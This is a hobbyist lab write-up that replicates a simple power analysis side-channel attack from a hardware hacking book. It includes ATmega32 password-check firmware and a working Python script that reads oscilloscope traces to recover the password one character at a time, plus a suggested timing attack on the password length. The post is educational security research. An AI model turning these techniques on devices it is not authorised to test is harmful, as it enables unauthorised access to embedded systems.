# SPA Attack Experiment 1

In late 2021, a book called “The Hardware Hacking Handbook” was published. I don’t remember exactly how I came across it, but after checking the table of contents and getting feedback from some friends, I decided to buy it. Skimming through it, I stumbled on chapter 9, which includes a simple power analysis (SPA) lab experiment. It’s an introduction to power analysis, and I was curious to try it in practice. So why not write about my experience replicating that lab?

During high school and my first university years, I spent some time playing with Atmel microcontrollers. Even though I’ve drifted away from this scene since then, I’ve followed some of the Arduino evolution. Thus, the lab apparatus wasn’t entirely new to me, but the experiment was!

## Scenario

The lab target is a microcontroller that asks for a password over a serial port. The attack uses the noise on the power supply to (somehow) learn the correct password. This type of attack is not new; according to the book, it dates back to the late ’90s, in the context of side-channel attacks on cryptography. However, the proliferation of microcontrollers and computers around us will likely make these attacks increasingly common.

## Power Analysis

As mentioned, the attack relies on analyzing the power consumption signal of a target device using a reasonably precise probe. One of the easiest ways of doing this (although there are others) is to place a shunt resistor between the target and the power source, as shown in the following drawing:

We then measure the voltage drop across the shunt resistor (Rs) and, by Ohm’s law, get the current flowing into the target: `I = V_Rs / Rs`.

To avoid using a differential probe, which is more expensive, one could measure the potential at each terminal of the resistor and subtract the two to get the voltage drop. This can be simplified further by assuming that the voltage source (Vcc) is ideal and constant: we use a single probe, measure the potential V- of the negative node relative to ground, and subtract it from the ideal Vcc: `V_Rs = Vcc - V-`.

So, the current consumption analysis can be done by capturing the voltage at the negative node of the resistor. We’d expect that this voltage would show some differences when the correct character of the password is used compared to incorrect password characters.
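As a minimal sketch of that arithmetic, the following Python function turns a single-ended reading of V- into a current estimate. The function name, the 10 Ω shunt, and the voltages are hypothetical values chosen for illustration; they are not taken from the lab.

```python
def target_current(v_minus, vcc, r_shunt):
    """Estimate the target current (in amperes) from a single-ended probe.

    v_minus: voltage measured at the negative node of the shunt, to ground
    vcc:     supply voltage, assumed ideal and constant
    r_shunt: shunt resistance in ohms
    """
    if r_shunt <= 0:
        raise ValueError("shunt resistance must be positive")
    v_drop = vcc - v_minus      # voltage across the shunt
    return v_drop / r_shunt     # Ohm's law: I = V / R


# Hypothetical numbers: 4.5 V supply, 10 ohm shunt, 4.25 V at the target side.
current = target_current(v_minus=4.25, vcc=4.5, r_shunt=10.0)
print("Estimated current: %.1f mA" % (current * 1000))
```

Since Vcc and Rs are constant, the shape of the V- trace alone already carries the information about the current variations, which is why a single probe is enough.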

## Simplifying

Measuring the current consumption is very reliable and should give the most accurate results. Alternatively, we can measure the voltage variations caused by small, fast changes in the current drawn by the target. This is only possible because real-world power sources are not ideal: they take time to restore the voltage after a change in current draw. That’s one of the reasons to use decoupling capacitors on the power supply rails. These help keep the voltage as stable as possible.

That said, I won’t be measuring the current variations but the noise on the supply voltage instead. To do this, we need to get rid of any capacitor on the power supply rails. Initially, I was using the STK500 programmer board with an external Vtarget, but I missed that even this rail was connected to some smoothing capacitors. Thus, any information in the voltage noise was being smoothed out by the capacitors.

Now, we need to power the target somehow. Without capacitors on the power line, switching converters (buck, boost, and variants) would inject unwanted noise into our captured signal. Alternatively, we could use a linear voltage regulator (with lower noise), but I had none at hand.

So the solution I used was a cleaner power supply... what’s the most basic low-noise power supply we know? A battery. So, I connected 3xAAA power cells to get around 4.5V, which was sufficient to power my target microcontroller.

## Lab Preparation

I used the following parts:

• Digital Scope (I used PicoScope 2406B, 1GS/s, 32MS)
• ATmega32 microcontroller
• USB to Serial converter (FTDI)
• 3xAAA power cells
• AVR programmer board (STK500, but any will do)
• Breadboard and a few wires

The lab setup is basic and described in the following diagram:

After mounting this setup, it looks like the following picture (the power from power cells is disconnected just to avoid wasting battery):

Before we can perform the experiments on noise analysis, we need to prepare the target. That’s described in the next section.

## Target Software

I’ve used the same sample code as the one from the book with a few changes:

1. Removed the random delays;
2. Added code to set the trigger pin low right after the comparison.

Since it’s my first experiment, I wanted to confirm I was seeing the signal noise at the right time and not, for example, missing data because the capture window was too short. Even though we wouldn’t have these shortcuts in a realistic scenario, other hacks can help overcome these limitations (some ideas are shared at the end).

The code used for the target was the following (based on code from the book):

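``````
// Trigger is PB0 (pin 1)
int triggerPin = PB0;

// Lines marked "reconstructed" complete the password handling along the lines
// of the book's sample. The password value is an assumption: any 11-character
// password starting with 'i' fits the tests in this post.
String known_passwordstr = String("ilovecheese");  // reconstructed
String input_passwordstr;                          // reconstructed
char input_password[20];                           // reconstructed
char tempchr;
int index;

// the setup routine runs once when you press reset:
void setup() {
  // initialize serial communication at 9600 bits per second:
  Serial.begin(9600);
  pinMode(triggerPin, OUTPUT);
  tempchr = '0';
  index = 0;
}

// the loop routine runs over and over again forever:
void loop() {
  //Wait a little bit after startup & clear everything
  digitalWrite(triggerPin, LOW);
  delay(250);
  Serial.flush();
  Serial.write("Enter Password:");                 // reconstructed
  // wait for last character
  while ((tempchr != '\n') && (index < 19)) {
    if (Serial.available() > 0) {
      tempchr = Serial.read();                     // reconstructed
      input_password[index++] = tempchr;           // reconstructed
    }
  }
  // Null terminate and strip non-characters
  input_password[index] = '\0';                    // reconstructed
  input_passwordstr = String(input_password);      // reconstructed
  input_passwordstr.trim();                        // reconstructed
  index = 0;
  tempchr = 0;
  digitalWrite(triggerPin, HIGH);
  if (input_passwordstr == known_passwordstr) {    // reconstructed
    digitalWrite(triggerPin, LOW);
    Serial.write("Password OK\n");                 // reconstructed
  } else {
    digitalWrite(triggerPin, LOW);
    //Delay up to 500ms randomly
    //delay(random(500));
    Serial.write("Password Bad\n");                // reconstructed
  }
}
``````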

It’s worth mentioning that the password comparison line calls `String::equals()` through the `==` operator. Its code is the following (taken from `WString.cpp` in the Arduino core):

``````
...
unsigned char String::equals(const String &s2) const
{
return (len == s2.len && compareTo(s2) == 0);
}
...
``````

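It first compares the lengths of both strings, then calls the `compareTo` function. The latter uses `strcmp`, which is known to be inadequate for comparing passwords: it returns at the first mismatching character, so the work it does depends on how many leading characters are correct. It also means that one part of the attack (not explored in this post) is finding the correct password length, since `strcmp` only runs when the lengths match.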
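To make the leak concrete, here is a small Python sketch (not the target code) that mimics an early-exit comparison and counts how many characters it looks at. The `SECRET` value and the function names are hypothetical; `hmac.compare_digest` is shown only as an example of a comparison designed not to stop at the first mismatch.

```python
import hmac


def early_exit_compare(guess, secret):
    """Compare like strcmp: stop at the first mismatching character.

    Returns (equal, steps), where steps is the number of character
    comparisons performed. That count is what leaks through a side channel.
    """
    steps = 0
    for g, s in zip(guess, secret):
        steps += 1
        if g != s:
            return False, steps
    return len(guess) == len(secret), steps


def constant_time_compare(guess, secret):
    """Comparison whose duration does not depend on where the strings differ."""
    return hmac.compare_digest(guess.encode(), secret.encode())


SECRET = "ixxxxxxxxxx"  # hypothetical 11-character password

print(early_exit_compare("aaaaaaaaaaa", SECRET))  # (False, 1)
print(early_exit_compare("iaaaaaaaaaa", SECRET))  # (False, 2)
```

A guess with a correct first character makes the comparison run one step longer, and that extra step is what shows up in the power traces later in this post.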

Refer to Appendix A for information on how I’ve programmed the target. I felt it was a bit off-topic to include in the main text. Once the target is programmed, we’re ready to do the first tests.

## First tests and results...

I’ve used a Linux serial client (screen, minicom, etc.) to test if the target is working as expected. To communicate with the target, we need to ensure the baud rate is set to 9600. Then I typed a few characters until the password buffer was filled and waited for the response.

Once I verified that the serial communication was working as expected, I made the first captures from the oscilloscope. I’ve used channel A for the voltage noise capture (AC mode, 100mV, 2u to 5u) and channel B for the trigger (DC mode, 10V, 2V trigger on rising edge).

The following graph shows the voltage noise for two password attempts: `aaaaaaaaaaa` (represented by “V(a)”) and `iaaaaaaaaaa` (represented by “V(i)”). I’ve included the trigger signals, which allow us to see approximately when the comparison ends.

To avoid having too much information in the time graph, I’ve cropped everything before 16 µs. Both signals are very similar from the trigger at the start of the capture until around 18 µs. The grid spacing is 125 ns, the period of the 8 MHz target clock (most of the target’s instructions take a single cycle). From this preliminary time graph, we can already make a few comments.

1. I was surprised to find that the noise signals are very similar for the same internal target behavior. I was expecting more noise and more differences between the signals!
2. Even though we sent 11 characters, we know that the comparison ends at the first differing character. This means we won’t see the voltage noise for all the character comparisons in the graph, and we have to guess one password character at a time.
3. We can see that the trigger goes low later for the `iaaaaaaaaaa` password, which is in line with a string comparison that went one character further in the target. The delay suggests that around 8 clock cycles separate two consecutive character comparisons.
4. The exit path of the comparison (comparison function return and trigger switch) should use similar instructions. Hence, we can see two identical voltage signals with a time offset between them.

Can you spot where the string comparison deviates? It seems to happen right after 18 µs, at the C1 mark in the following time chart.

We can see that the pair of spikes is lower when the password character is correct. To help confirm this hypothesis, we can look at the signals for all the other wrong characters (`a-z` except `i`) and see that the behavior is the same: they all have a pair of spikes above 2V in this time region.
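Spotting the deviation by eye works, but it can also be located programmatically. The following is a minimal sketch, assuming two captures of the same length that are aligned on the trigger; the function name, the threshold, and the synthetic traces are made up for illustration.

```python
def first_divergence(trace_a, trace_b, threshold):
    """Return the index of the first sample where two aligned traces differ
    by more than `threshold`, or None if they never do."""
    for i, (a, b) in enumerate(zip(trace_a, trace_b)):
        if abs(a - b) > threshold:
            return i
    return None


# Synthetic traces: identical for 10 samples, then one shows higher spikes.
trace_wrong = [0.0] * 10 + [2.5, 2.4] + [0.0] * 5
trace_right = [0.0] * 10 + [1.0, 1.1] + [0.0] * 5

idx = first_divergence(trace_wrong, trace_right, threshold=0.5)
print("Traces diverge at sample", idx)  # Traces diverge at sample 10
```

Multiplying the returned index by the sampling interval gives the time offset from the start of the capture, which is how a value such as the 18 µs mark could be found without reading it off a chart.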

Moving to the next character, we have the exact same behavior as shown in the following graph: approximately 8 clock cycles after the first comparison (in C2), we see the two distinct spikes again:

To be more confident that these spikes are related to the comparison, we can check in the assembly listing whether the number of cycles between two character comparisons is around 8. Refer to Appendix A for this analysis.

To implement a brute-force algorithm, we look for data points above ~2V in a time window that starts at t, for the character index n and the target clock period C: `t(n) = 18 µs + 8 * C * n`. With C = 125 ns, each additional character shifts the window by 1 µs.
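As a worked example of that timing, the sketch below computes the window for the first few character indexes. The 18 µs offset, the 8 cycles per character, and the 2-cycle window width are the values used by the script below; the function name and its parameters are just for illustration.

```python
def comparison_window_us(n, t0_us=18.0, clock_hz=8e6,
                         cycles_per_char=8, width_cycles=2):
    """Return (start, end) in microseconds of the window where the spikes
    for character index n are expected, relative to the trigger."""
    period_us = 1e6 / clock_hz                      # C = 0.125 us at 8 MHz
    start = t0_us + cycles_per_char * period_us * n
    return start, start + width_cycles * period_us


for n in range(3):
    print(n, comparison_window_us(n))
# 0 (18.0, 18.25)
# 1 (19.0, 19.25)
# 2 (20.0, 20.25)
```

Dividing these times by the scope’s sampling interval gives the sample indexes to inspect in each capture.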

I’ve used the following Python script to programmatically brute-force the password.

``````
# spacode_crack.py, based on scripts from the book.
import serial
import time
# picoscope module from https://github.com/colinoflynn/pico-python
from picoscope import ps2000a
import numpy as np
import string
import sys

def fill_pass(pw):
    # Pad the guess with "a" up to the 11-character password length
    if len(pw) < 11:
        return pw + "a"*(11 - len(pw))
    else:
        return pw

def build_pass(cur_pw, idx):
    return fill_pass(cur_pw + string.ascii_lowercase[idx])

# Threshold applied to the normalized capture (see the main loop)
V_THRESHOLD=2.1
def test_capture(data, cur_n, sample_period):
    # Target clock period in microseconds (8MHz)
    C=1/(8e6)*1e6
    # 2-cycle window starting 18us after the trigger, plus 8 cycles per character
    idx_low = round((18+8*C*cur_n)/(sample_period*1e6))
    idx_high = round((18+8*C*cur_n + 2*C)/(sample_period*1e6))

    for i in range(idx_low,idx_high):
        if data[i] > V_THRESHOLD:
            return False

    # No voltage peaks related to a different character: this is potentially the correct one.
    return True

try:
    ser = serial.Serial(
        port='/dev/ttyUSB0',
        baudrate=9600,
        timeout=0.500
    )
    ps = ps2000a.PS2000a()
    print("Found the following picoscope:")
    print(ps.getAllUnitInfo())

    # Need at least 30us from trigger (8MHz ATMEL)
    obs_duration = 35E-6

    # Sample at least 5000 points within that window
    sampling_interval = obs_duration / 5000

    # Cut-off for HP filter (unused in this version)
    freq1 = 400e3
    # Cut-off for LP filter (unused in this version)
    freq2 = 16e6

    # Turn channels C and D off
    ps.setChannel('C', enabled=False)
    ps.setChannel('D', enabled=False)

    # Configure timebase
    (actualSamplingInterval, nSamples, maxSamples) = \
        ps.setSamplingInterval(sampling_interval, obs_duration)
    # Despite the label, this prints the total capture window (interval * samples)
    print("Sampling interval = %f us" % (actualSamplingInterval * nSamples * 1E6))

    # Channel B is the trigger
    ps.setChannel('B', 'DC', 10.0, 0.0, enabled=True, BWLimited=True)
    ps.setSimpleTrigger('B', 2.0, 'Rising', delay=10, timeout_ms=5000, enabled=True)

    # 1V range on channel A, AC coupled, bandwidth limited
    ps.setChannel('A', 'AC', 1, 0.0, enabled=True, BWLimited=True)

    data_list = []
    cur_pass = ""
    cur_n = 0

    #Clear system
    ser.write(("abcde\n").encode("utf-8"))

    while True:
        # Try next character
        found = False
        for idx in range(len(string.ascii_lowercase)):
            pw_test = build_pass(cur_pass, idx)
            ps.runBlock()
            time.sleep(0.05)

            ser.write((pw_test + "\n").encode("utf-8"))
            # Reconstructed (assumption): read the reply and stop once the
            # target accepts the password.
            r = ser.read(64).decode("utf-8", errors="ignore")
            #print("Got response: %s" % r)
            if "Password OK" in r:
                print("Found password: %s" % pw_test)
                sys.exit(0)

            data = ps.getDataV('A', nSamples, returnOverflow=False)
            # Normalize (zero mean, unit variance) and invert the capture
            data = -1.0 * (data - np.mean(data)) / np.std(data)
            if test_capture(data, cur_n, actualSamplingInterval) == True:
                found = True
                cur_pass = cur_pass + string.ascii_lowercase[idx]
                cur_n += 1
                break

            # Continue trying another character.

        if not found:
            print("Error: failed to find the correct character at offset %d!" % cur_n)
            sys.exit(-1)

finally:
    #Always close off things
    ser.close()
    ps.stop()
    ps.close()
``````

The output after a few rounds of trial and error was:

``````
Found the following picoscope:
DriverVersion                 : PS2000A Linux Driver, 2.1.78.3011
...
timebase = 2
timebase_dt = 4e-09
noSamples = 8750
Sampling interval = 35.000000 us
$
``````

It’s not printing all the attempts, but you can easily enable those. I had to run it a few times (3 or 4) until it recovered the complete password. The code is very simple and doesn’t use any technique to make it more tolerant of electrical noise and deviations. For example, we could average several captures of the same character attempt instead of relying on a single capture.
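A minimal sketch of that averaging idea follows, written in plain Python to keep it self-contained. The function name and the sample values are hypothetical; in the script above, the captures would come from repeated `ps.getDataV(...)` calls for the same guess.

```python
def average_traces(traces):
    """Average several equally long captures sample by sample, so that
    random noise shrinks while the repeatable signal stays."""
    if not traces:
        raise ValueError("need at least one trace")
    length = len(traces[0])
    if any(len(t) != length for t in traces):
        raise ValueError("all traces must have the same length")
    return [sum(samples) / len(traces) for samples in zip(*traces)]


# Three captures of the same guess; one has a random glitch at sample 2.
captures = [
    [0.0, 0.0, 3.0, 0.0],
    [0.0, 0.0, 0.0, 0.0],
    [0.0, 0.0, 0.0, 0.0],
]
print(average_traces(captures))  # [0.0, 0.0, 1.0, 0.0]
```

In this made-up case, the glitch would have crossed the 2.1 threshold in a single capture, but the averaged trace stays below it. The price is more attempts per character, so the attack takes proportionally longer.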

## Final Words

This experiment was just a proof-of-concept: a few simplifications were used, deviating a bit from real-world scenarios. For instance, it wasn’t described how we could find the correct password size. There is a trigger signal to help know when the password comparison starts. I also used this signal to locate the end of the comparison more accurately, even though this information won’t be used in the brute-force script.

However, overcoming these difficulties shouldn’t be impossible either. There are always techniques and little hacks that can help. I can think of the following for these two problems:

The trigger signal is used to know when the comparison is about to start. Without it, we still know that as soon as we send the newline that terminates the password, the target receives that character and compares the password. We would be capturing the signal a bit early and would probably need to extend the capture period until we learn where the comparison is made.

I think a timing attack could be used to find the correct password length. When the password matches the correct length, the code will call `strcmp`, which will delay the “Password Bad” response. By comparing the “Password Bad” response time, it might be possible to know when the correct password size is used.
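The idea could be sketched as follows. This is only an illustration under strong assumptions: `measure_response_time` is a hypothetical callable that sends a guess and returns how long the reply took, and here it is replaced by a simulated target. On real hardware the extra `strcmp` time is only a few clock cycles, so serial latency jitter would likely hide it unless the timing is taken with the scope.

```python
import statistics


def guess_length(measure_response_time, max_len=19, repeats=5):
    """Return the candidate length whose median response time is the longest.

    max_len defaults to 19 because the target stops reading at 19 characters.
    """
    medians = {}
    for length in range(1, max_len + 1):
        guess = "a" * length
        samples = [measure_response_time(guess) for _ in range(repeats)]
        medians[length] = statistics.median(samples)
    return max(medians, key=medians.get)


def fake_target(guess, secret_len=11):
    """Simulated target: replies slightly later when the length matches."""
    return 1.0 + (0.001 if len(guess) == secret_len else 0.0)


print(guess_length(fake_target))  # 11
```

Using the median of several measurements per length is a design choice to reduce the effect of occasional outliers.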

Nevertheless, it was a fun challenge, and I look forward to doing other hardware security experiments.

Cheers!

# Appendix A

## Preparing the Target

First we need to install the Arduino core for the corresponding chip model. Arduino does not directly support all Atmel chips. Fortunately, the community has ported the Arduino core to many other Atmel chips, including those I had kept in my electronics parts boxes since my university years. I had several spare microcontrollers, but the one that I found to be working was an ATmega32.

To find an Arduino core for this chip, a quick Google search leads us to:

https://github.com/MCUdude/MightyCore

We first add this core index URL to the local Arduino configuration:

``````
$ arduino-cli config add board_manager.additional_urls \
https://mcudude.github.io/MightyCore/package_MCUdude_MightyCore_index.json
``````

Now we refresh the index with:

``````
$ arduino-cli core update-index
``````

Let’s confirm we now have support for the ATmega32 with:

``````
$ arduino-cli core search atmega32
ID                   Version Name
atmel-avr-xminis:avr 0.6.0   Atmel AVR Xplained-minis
MightyCore:avr       2.1.3   MightyCore
``````

Then we install the core:

``````
$ arduino-cli core install MightyCore:avr
Installing platform MightyCore:avr@2.1.3
Configuring platform....
Platform MightyCore:avr@2.1.3 installed
``````

I didn’t need to install the bootloader separately because I program the microcontroller directly through ICSP. The `arduino-cli compile` and `arduino-cli upload` commands already include the bootloader in the binary, as will be shown next.

### Compiling

First we grab the Lab1 code from the Hardware Hacking Handbook and put it in an Arduino source code file (I called mine PsaSketch).

Now we run the `arduino-cli` command to compile, providing the chip information:

``````
$ arduino-cli compile -b MightyCore:avr:32:clock=8MHz_internal PsaSketch.ino
``````

You can use any programmer you prefer; I’m just sharing what I used, the STK500. I don’t think it’s a commonly used board nowadays, and it’s probably easier to use a USBasp or an Arduino as ISP. But it really doesn’t matter as long as you can program the chip.

Since I’m using the STK500 to program the chip, the following description only applies if you’re using the same board; otherwise, you may skip to the next section. I had to connect the ISP6PIN header to SPROG3 (the red one, matching the socket where the ATmega32 is plugged in), as shown with the arrow in the following picture:

The square highlight marks the connection for the spare RS232 port, and the circle highlight marks the connection for the “trigger” LED (PB0).

Now that the board is ready, we can call `arduino-cli` to upload the binary:

``````
$ arduino-cli upload -b MightyCore:avr:32:clock=8MHz_internal \
-P stk500 -p /dev/ttyUSB0 -v .
...
avrdude: Version 6.3-20201216
Copyright (c) 2000-2005 Brian Dean, http://www.bdmicro.com/

...
Using Port                    : /dev/ttyUSB0
Using Programmer              : stk500
AVR Part                      : ATmega32
Chip Erase delay              : 9000 us
PAGEL                         : PD7
BS2                           : PA0
RESET disposition             : dedicated
RETRY pulse                   : SCK
serial program mode           : yes
parallel program mode         : yes
Timeout                       : 200
StabDelay                     : 100
CmdexeDelay                   : 25
SyncLoops                     : 32
ByteDelay                     : 0
PollIndex                     : 3
PollValue                     : 0x53
Memory Detail                 :

                       Block Poll               Page                       Polled
Memory Type Mode Delay Size  Indx Paged  Size   Size #Pages MinW  MaxW   ReadBack
----------- ---- ----- ----- ---- ------ ------ ---- ------ ----- ----- ---------
eeprom         4    10    64    0 no       1024    4      0  9000  9000 0xff 0xff
flash         33     6    64    0 yes     32768  128    256  4500  4500 0xff 0xff
lfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
hfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
efuse          0     0     0    0 no          0    0      0     0     0 0x00 0x00
lock           0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
signature      0     0     0    0 no          3    0      0     0     0 0x00 0x00
calibration    0     0     0    0 no          4    0      0     0     0 0x00 0x00

Programmer Type : STK500V2
Description     : Atmel STK500
Programmer Model: STK500
Hardware Version: 2
Firmware Version Master : 2.10
Topcard         : Unknown
Vtarget         : 5.1 V
SCK period      : 35.3 us
Varef           : 3.2 V
Oscillator      : 3.686 MHz

avrdude: AVR device initialized and ready to accept instructions

Reading | ################################################## | 100% 0.01s

avrdude: Device signature = 0x1e9502 (probably m32)
avrdude: NOTE: "flash" memory has been specified, an erase cycle will be performed
To disable this feature, specify the -D option.
avrdude: erasing chip
avrdude: writing flash (32768 bytes):

Writing | ################################################## | 100% 6.97s

avrdude: 32768 bytes of flash written

avrdude done.  Thank you.
``````

As soon as we upload the code, we can see the LED light up (the chip code starts running right away). This happens because the VTARGET jumper on this board is shorted, so we’re powering the chip directly from the STK500.

## Assembly Instructions

The piece of code that performs the character comparison can be analyzed in the target binary disassembly, in the `strcmp` function:

``````
strcmp():
102c:       fb 01           movw    r30, r22       ; Z=r31:r30
102e:       dc 01           movw    r26, r24       ; X=r27:r26
1030:       8d 91           ld      r24, X+        ; r24=X, X+=1 (2C)
1032:       01 90           ld      r0, Z+         ; r0=Z, Z+=1 (2C)
1034:       80 19           sub     r24, r0        ; r24-=r0 (1C)
1036:       01 10           cpse    r0, r1         ; if r0 == 0 ? (!1C,2C)
1038:       d9 f3           breq    .-10           ; 0x1030 <strcmp+0x4>
103a:       99 0b           sbc     r25, r25       ; r25=r25-r25=0
103c:       08 95           ret
``````

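If we follow a trace starting at the `cpse` instruction while the characters still match, we count 8 clock cycles per loop iteration:

1. `cpse`: since `r0` is not zero (we haven’t reached the end of the string), the skip condition is false, so it consumes one clock cycle and the next instruction is executed;
2. the next instruction is `breq`. `cpse` doesn’t change the status flags, so `breq` tests the Z flag left by the earlier `sub`, which is set when both characters are equal. The branch is therefore taken and takes two clock cycles (a branch that is not taken would take only one);
3. then, the two `ld` instructions, which take two clock cycles each (four in total);
4. the subtraction, which takes one clock cycle;
5. ...and we reach the `cpse` instruction again, after 8 clock cycles.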
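The count above can be double-checked with a few lines of Python. The cycle values are the ones listed in the steps above; the names are only for illustration.

```python
# Cycles per instruction for one loop iteration while the characters match.
LOOP_CYCLES = [
    ("cpse r0, r1", 1),   # no skip: end of string not reached
    ("breq .-10", 2),     # branch taken: characters are equal
    ("ld r24, X+", 2),
    ("ld r0, Z+", 2),
    ("sub r24, r0", 1),
]


def loop_cycles(instructions):
    """Total number of clock cycles for the listed instructions."""
    return sum(cycles for _, cycles in instructions)


total = loop_cycles(LOOP_CYCLES)
period_us = 1e6 / 8e6  # 8 MHz clock, 0.125 us per cycle
print(total, "cycles =", total * period_us, "us")  # 8 cycles = 1.0 us
```

One microsecond per character matches the spacing between the C1 and C2 marks seen in the captures.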